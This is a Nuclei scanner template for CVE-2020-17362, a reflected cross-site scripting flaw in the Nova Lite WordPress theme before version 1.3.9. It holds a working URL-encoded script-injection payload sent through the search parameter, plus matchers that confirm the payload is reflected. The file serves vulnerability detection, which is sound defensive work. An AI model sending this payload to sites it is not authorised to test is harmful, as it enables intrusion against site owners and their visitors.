56 lines
1.6 KiB
YAML
56 lines
1.6 KiB
YAML
id: CVE-2020-17362
|
|
|
|
info:
|
|
name: Nova Lite < 1.3.9 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php.
|
|
remediation: |
|
|
Upgrade to Nova Lite version 1.3.9 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-17362
|
|
- https://themes.trac.wordpress.org/browser/nova-lite/1.3.9/readme.txt?rev=134076
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2020-17362
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00101
|
|
epss-percentile: 0.41294
|
|
cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: themeinprogress
|
|
product: nova_lite
|
|
framework: wordpress
|
|
tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,unauth
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "nova-lite"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100cc68645fa7bae87be21160258695343477191664f3a38c0667839e58a09a61fe022100e8ff0b756f269689e3f6335ba86f2fe92b5b6e0e5349a8cae25db0f096f800eb:922c64590222798bb761d5b6d8e72950
|